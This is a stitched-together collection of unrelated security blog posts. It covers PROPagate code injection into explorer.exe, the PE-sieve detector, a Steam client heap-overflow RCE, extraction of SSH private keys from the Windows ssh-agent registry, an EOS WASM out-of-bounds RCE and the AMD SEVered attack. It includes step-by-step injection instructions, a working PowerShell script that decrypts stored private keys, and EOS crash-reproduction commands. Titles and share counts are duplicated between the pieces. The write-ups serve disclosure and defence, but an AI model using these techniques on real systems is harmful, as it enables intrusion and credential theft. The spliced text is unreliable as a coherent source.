So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

PE-sieve — Hook Finder is open source tool based on libpeconv.

PE-sieve (previously known as Hook Finder) is open source tool based on libpeconv.
It scans a given process, searching for manually loaded or modified modules. When found, it dumps the modified/suspicious PE along with a report in JSON format, detailing about the found indicators.
Currently it detects inline hooks, hollowed processes, Process Doppelgänging, injected PE files etc. In case if the PE file was patched in the memory, it gives a detailed report about where are the changed bytes (and few other properties).

The tool is under rapid development, so expect frequent updates.

PE-sieve is available in 2 versions – as standalone executable, and as a DLL. The DLL version became a base of my other project: HollowsHunter – that makes an automated scan of all the running processes. More about it in the further part of the post.

Where to get it?

The tool is open-source, available on my github:

  https://github.com/hasherezade/pe-sieve

Usage

It has a simple, commandline interface. When run without parameters, it displays info about the version and required arguments:

When you run it giving a PID of the running process, it scans all the PE modules in its memory (the main executable, but also all the loaded DLLs). At the end, you can see the summary of how many anomalies have been detected of which type.

In case if some modified modules has been detected, they are dumped to a folder of a given process, for example:

Short history & features

Detecting inline hooks and patches

I started creating it for the purpose of searching and examining inline hooks. You can see it in action here (old version):

It not only detects that there IS an anomaly/patch, but also WHERE exactly it is. For each dumped PE where the patches were found, it creates a file with tags, that can be loaded by PE-bear.

Thanks to this, we can easily browse the found hooks and check the code that was overwritten.

For example – in the application presented above, the Entry Point was patched and the execution was redirected to the added, malicious section:

Detecting hollowed processes

Later, I extended it to detect process hollowing etc – and it turned out to be pretty convenient unpacker:

Detecting Process Doppelgänging

In a similar manner, it can detects some other methods of impersonating a processes, for example Process Doppelgänging. The malicious payload is directly dumped and ready to be analyzed:

Recovering erased imports

PE-sieve has an ability to recover erased imports. In order to enable it, deploy it with appropriate option. Example – unpacking manually loaded payloads with imports erased (Emotet):

Future development

The project is still not finished and I have many ideas how to make it better. I am planning to detect not only code modifications, but also other types of hooking, such as IAT and EAT patching.

Some in-memory patches are done by legitimate applications, so, in the future version I will provide capability of whitelisting defined patches.

I am also planning to extend its dumping capabilities against the malicious processes that are trying to defend themselves against dumpers etc.

PE-sieve as a DLL

During the development process I got an idea to make a DLL version of the PE-sieve, so that it can be incorporated in other projects.

Building PE-sieve from sources as a DLL is very easy – you just need to set one CMake option: PE_SIEVE_AS_DLL:

build_as_dll

The PE-sieve DLL exposes a minimalistic API. Two functions are exported:

pe-sieve_func

  1. PESieve_help – displays a short info and the version of the DLL.
  2. PESieve_scan – a typical scan with a given parameters, like in the PE-Sieve.exe

The necessary headers needs to be included from the folder “pe-sieve\include“:

https://github.com/hasherezade/pe-sieve/tree/master/include

I have plans to enrich the API in the future. For now, you can see the PE-sieve DLL in action in the HollowsHunter project.

Ideas? Bugs?

If you noticed bug or have an idea for a useful feature, don’t hesitate to mail me or create a Github issue – I check them regularly:

https://github.com/hasherezade/pe-sieve/issues

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Extracting SSH Private Keys from Windows 10 ssh-agent

Intro

This weekend I installed the Windows 10 Spring Update, and was pretty excited to start playing with the new, builtin OpenSSH tools.

Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included.

I found some references to using the new Windows ssh-agent in this MSDN article, and this part immediately grabbed my attention:

Securely store private keys

I’ve had some good fun in the past with hijacking SSH-agents, so I decided to start looking to see how Windows is «securely» storing your private keys with this new service.

I’ll outline in this post my methodology and steps to figuring it out. This was a fun investigative journey and I got better at working with PowerShell.

tl;dr

Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry

Using OpenSSH in Windows 10

The first thing I tested was using the OpenSSH utilities normally to generate a few key-pairs and adding them to the ssh-agent.

First, I generated some password protected test key-pairs using ssh-keygen.exe:

Powershell ssh-keygen

Then I made sure the new ssh-agent service was running, and added the private key pairs to the running agent using ssh-add:

Powershell ssh-add

Running ssh-add.exe -L shows the keys currently managed by the SSH agent.

Finally, after adding the public keys to an Ubuntu box, I verified that I could SSH in from Windows 10 without needing the decrypt my private keys (since ssh-agent is taking care of that for me):

Powershell SSH to Ubuntu

Monitoring SSH Agent

To figure out how the SSH Agent was storing and reading my private keys, I poked around a little and started by statically examining ssh-agent.exe. My static analysis skills proved very weak, however, so I gave up and just decided to dynamically trace the process and see what it was doing.

I used procmon.exe from Sysinternals and added a filter for any process name containing «ssh».

With procmon capturing events, I then SSH’d into my Ubuntu machine again. Looking through all the events, I saw ssh.exe open a TCP connection to Ubuntu, and then finally saw ssh-agent.exe kick into action and read some values from the Registry:

SSH Procmon

Two things jumped out at me:

  • The process ssh-agent.exe reads values from HKCU\Software\OpenSSH\Agent\Keys
  • After reading those values, it immediately opens dpapi.dll

Just from this, I now knew that some sort of protected data was being stored in and read from the Registry, and ssh-agent was using Microsoft’s Data Protection API

Testing Registry Values

Sure enough, looking in the Registry, I could see two entries for the keys I added using ssh-add. The key names were the fingerprint of the public key, and a few binary blobs were present:

Registry SSH Entries

Registry SSH Values

After reading StackOverflow for an hour to remind myself of PowerShell’s ugly syntax (as is tradition), I was able to pull the registry values and manipulate them. The «comment» field was just ASCII encoded text and was the name of the key I added:

Powershell Reg Comment

The (default) value was just a byte array that didn’t decode to anything meaningful. I had a hunch this was the «encrypted» private key if I could just pull it and figure out how to decrypt it. I pulled the bytes to a Powershell variable:

Powershell keybytes

Unprotecting the Key

I wasn’t very familiar with DPAPI, although I knew a lot of post exploitation tools abused it to pull out secrets and credentials, so I knew other people had probably implemented a wrapper. A little Googling found me a simple oneliner by atifaziz that was way simpler than I imagined (okay, I guess I see why people like Powershell…. 😉 )

Add-Type AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type raw (Join-Path $env:USERPROFILE foobar))), $null, ‘CurrentUser’))

I still had no idea whether this would work or not, but I tried to unprotect the byte array using DPAPI. I was hoping maybe a perfectly formed OpenSSH private key would just come back, so I base64 encoded the result:

Add-Type -AssemblyName System.Security  
$unprotectedbytes = [Security.Cryptography.ProtectedData]::Unprotect($keybytes, $null, 'CurrentUser')

[System.Convert]::ToBase64String($unprotectedbytes)

The Base64 returned didn’t look like a private key, but I decoded it anyway just for fun and was very pleasantly surprised to see the string «ssh-rsa» in there! I had to be on the right track.

Base 64 decoded

Figuring out Binary Format

This part actually took me the longest. I knew I had some sort of binary representation of a key, but I could not figure out the format or how to use it.

I messed around generating various RSA keys with opensslputtygen and ssh-keygen, but never got anything close to resembling the binary I had.

Finally after much Googling, I found an awesome blogpost from NetSPI about pulling out OpenSSH private keys from memory dumps of ssh-agent on Linux: https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/

Could it be that the binary format is the same? I pulled down the Python scriptlinked from the blog and fed it the unprotected base64 blob I got from the Windows registry:

parse_mem.py

It worked! I have no idea how the original author soleblaze figured out the correct format of the binary data, but I am so thankful he did and shared. All credit due to him for the awesome Python tool and blogpost.

Putting it all together

After I had proved to myself it was possible to extract a private key from the registry, I put it all together in two scripts.

GitHub Repo

The first is a Powershell script (extract_ssh_keys.ps1) which queries the Registry for any saved keys in ssh-agent. It then uses DPAPI with the current user context to unprotect the binary and save it in Base64. Since I didn’t even know how to start parsing Binary data in Powershell, I just saved all the keys to a JSON file that I could then import in Python. The Powershell script is only a few lines:

$path = "HKCU:\Software\OpenSSH\Agent\Keys\"

$regkeys = Get-ChildItem $path | Get-ItemProperty

if ($regkeys.Length -eq 0) {  
    Write-Host "No keys in registry"
    exit
}

$keys = @()

Add-Type -AssemblyName System.Security;

$regkeys | ForEach-Object {
    $key = @{}
    $comment = [System.Text.Encoding]::ASCII.GetString($_.comment)
    Write-Host "Pulling key: " $comment
    $encdata = $_.'(default)'
    $decdata = [Security.Cryptography.ProtectedData]::Unprotect($encdata, $null, 'CurrentUser')
    $b64key = [System.Convert]::ToBase64String($decdata)
    $key[$comment] = $b64key
    $keys += $key
}

ConvertTo-Json -InputObject $keys | Out-File -FilePath './extracted_keyblobs.json' -Encoding ascii  
Write-Host "extracted_keyblobs.json written. Use Python script to reconstruct private keys: python extractPrivateKeys.py extracted_keyblobs.json"  

I heavily borrowed the code from parse_mem_python.py by soleblaze and updated it to use Python3 for the next script: extractPrivateKeys.py. Feeding the JSON generated from the Powershell script will output all the RSA private keys found:

Extracting private keys

These RSA private keys are unencrypted. Even though when I created them I added a password, they are stored unencrypted with ssh-agent so I don’t need the password anymore.

To verify, I copied the key back to a Kali linux box and verified the fingerprint and used it to SSH in!

Using the key

Next Steps

Obviously my PowerShell-fu is weak and the code I’m releasing is more for PoC. It’s probably possible to re-create the private keys entirely in PowerShell. I’m also not taking credit for the Python code — that should all go to soleblaze for his original implementation.

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

Vulnerability Description

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

We found and successfully exploit a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, attacker could upload a malicious smart contract to the nodes server, after the contract get parsed by nodes server, the malicious payload could execute on the server and taken control of it.

After taken control of the nodes server, attacker could then pack the malicious contract into new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline

2018-5-11                  EOS Out-of-bound Write Vulnerability Found

2018-5-28                Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28                Vulnerability Details Reported to Vendor

2018-5-29                 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29                   Notices the Vendor the Fixing is not complete

Some Telegram chats with Daniel Larimer:

We trying to report the bug to him.

He said they will not ship the EOS without fixing, and ask us send the report privately since some people are running public test nets

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

EOS fixed the vulnerability and Daniel would give the acknowledgement.

RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Technical Detail of the Vulnerability  

This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (Line 78),Function binaryen_runtime::instantiate_module:

for (auto& segment : module->table.segments) {
Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
assert(offset + segment.data.size() <= module->table.initial);
for (size_t i = 0; i != segment.data.size(); ++i) {
table[offset + i] = segment.data[i]; <= OOB write here !
}
}

Here table is a std::vector contains the Names in the function table. When storing elements into the table, the |offset| filed is not correctly checked. Note there is a assert before setting the value, which checks the offset, however unfortunately, |assert| only works in Debug build and does not work in a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| filed is also read from the WASM file, in the data section, it is a signed 32-bits value.

So basically with this vulnerability we can write to a fairly wide range after the table vector’s memory.

How to reproduce the vulnerability

  1. Build the release version of latest EOS code

./eosio-build.sh

  1. Start EOS node, finish all the necessary settings described at:

https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

  1. Set a vulnerable contract:

We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see nodeos process gets segment fault.

The crash info:

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()

(gdb) x/i $pc

=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>:   mov    %rcx,(%rdx,%rax,1)

(gdb) p $rdx

$1 = 59699184

(gdb) p $rax

$2 = 34359738360

Here |rdx| points to the start of the |table| vector,

And |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.

Exploit the vulnerability to achieve Remote Code Execution

This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publishes a malicious contract to the EOS main network.

The malicious contract is first parsed by the EOS super node, then the vulnerability was triggered and the attacker controls the EOS super node which parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

  1. The attacker uploads malicious contracts to the nodeos server.
  2. The server nodeos process parses the malicious contracts, which triggers the vulnerability.
  3. With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieves arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
  4. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.

You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.

The Fixing of Vulnerability

Bytemaster on EOS’s github opened issue 3498 for the vulnerability that we reported:

And fixed the related code

But as the comment made by Yuki on the commit, the fixing is still have problem on 32-bits process and not so prefect.

Researchers Defeat AMD’s SEV Virtual Machine Encryption

Researchers defeat AMD’s Secure Encrypted Virtualization (SEV), demonstrating #SEVered attack that could allow malicious hypervisor to steal plain-text data from an encrypted virtual machine.

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD’s Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.

AMD’s Secure Encrypted Virtualization (SEV) technology, which comes with EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.

Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of lack in the integrity protection of the page-wise encryption of the main memory, allowing a malicious hypervisor to extract the full content of the main memory in plaintext from SEV-encrypted VMs.

Here’s the outline of the SEVered attack, as briefed in the paper: SEVered: Subverting AMD’s Virtual Machine Encryption

«While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.

«This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside.»

«We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM’s memory in plaintext.»

During their tests, the team was able to extract a test server’s entire 2GB memory data, which also included data from another guest VM.

In their experimental setup, the researchers used a with the Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running web services—the Apache and Nginx web servers—as well as an SSH server, OpenSSH web server in separate VMs.